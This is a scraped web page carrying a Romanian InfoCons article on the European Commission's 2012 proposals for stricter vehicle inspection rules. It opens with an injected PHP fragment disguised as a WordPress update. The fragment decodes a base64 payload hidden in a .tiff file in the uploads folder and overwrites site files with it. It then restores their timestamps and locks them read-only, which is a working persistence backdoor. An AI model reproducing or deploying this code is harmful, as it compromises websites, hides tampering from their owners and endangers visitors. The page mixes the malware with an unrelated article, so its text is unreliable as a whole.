$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Reguli mai stricte in domeniul Inspectiei Automobilelor – O noua atitudine

Pe soselele Europei isi pierd zilnic viata peste 5 persoane, in accidente cauzate de probleme de ordin tehnic.Din acest motiv, Comisia Europeana a adoptat noi reguli care inaspresc regimul de control si ii extind anvergura.

Defectiunile tehnice constituie o cauza importanta a accidentelor,determinand 6% din totalul accidentelor de automobil, ceea ce inseamna anual 2 000 de decese si mult mai multe accidentari.In ceea ce priveste accidentele de motocicleta, 8% din totalul acestora sunt legate de defectiuni tehnice.

Principala problema este aceea ca pe sosele exista prea multe vehicule cu probleme tehnice.Cateva studii recente elaborate in Regatul Unit si Germania indica faptul ca un procent de pana la 10% din autovehicule prezinta in orice moment o defectiune care le-ar impiedica sa treaca cu succes de controlul tehnic.In plus, conform regulilor actuale, multe defectiuni tehnice cu implicatii grave pentru securitate (cum ar fi ABS si controlul electronic al stabilitatii) nu sunt nici macar verificate.

Normele UE in vigoare care stabilesc standardele minime pentru controlul vehiculelor dateaza din 1977, cu actualizari minore.De atunci, insa, automobilele, conduita soferilor si tehnologia au evoluat foarte mult.

Obiectivul noilor propuneri este acela de a salva peste 1 200 de vieti anual si de a evita peste 36 000 de accidente cauzate de probleme de ordin tehnic.

Vicepresedintele Siim Kallas, responsabil cu transporturile, a declarat in legatura cu acest subiect: „Daca va aflati la volanul unei masini care nu indeplineste conditiile tehnice necesare pentru a circula, atunci reprezentati un pericol atat pentru dumneavoastra insiva, cat si pentru ceilalti pasageri din automobil – membri ai familiei, prieteni sau colegi de serviciu.  Si, mai mult decat atat, ii puneti in primejdie si pe ceilalti participanti la trafic.Lucrurile sunt cat se poate de simple:nu dorim pe drumurile noastre masini care pot deveni letale.”

Printre principalele elemente ale noilor masuri propuse se numara urmatoarele:

·  Verificarea obligatorie a scuterelor si motocicletelor in intreaga UE.Motociclistii si conducatorii de scutere, in special cei tineri, reprezinta grupul de participanti la trafic cu cel mai mare risc.

Cresterea frecventei inspectiilor tehnice periodice in cazul automobilelor vechi.In cazul automobilelor care au intre 5 si 6 ani, numarul accidentelor grave cauzate de defectiuni tehnice creste semnificativ (a se vedea graficul din MEMO/12/555).

·  Cresterea frecventei controalelor pentru autoturisme si camionete cu kilometraj foarte mare.Astfel, aceste tipuri de autovehicule vor face obiectul unor controale similare celor aplicate in cazul taxiurilor sau al ambulantelor, de exemplu.

·  Imbunatatirea calitatii controalelor prin stabilirea unor standarde minime comune in ceea ce priveste defectiunile, echipamentele si inspectorii.

·  Obligativitatea verificarii componentelor electronice de siguranta.

·  Combaterea manipularii kilometrajului prin inregistrarea kilometrilor parcursi.

Sursa: Comisia Europeana

Bruxelles, 13 iulie 2012

By o9admin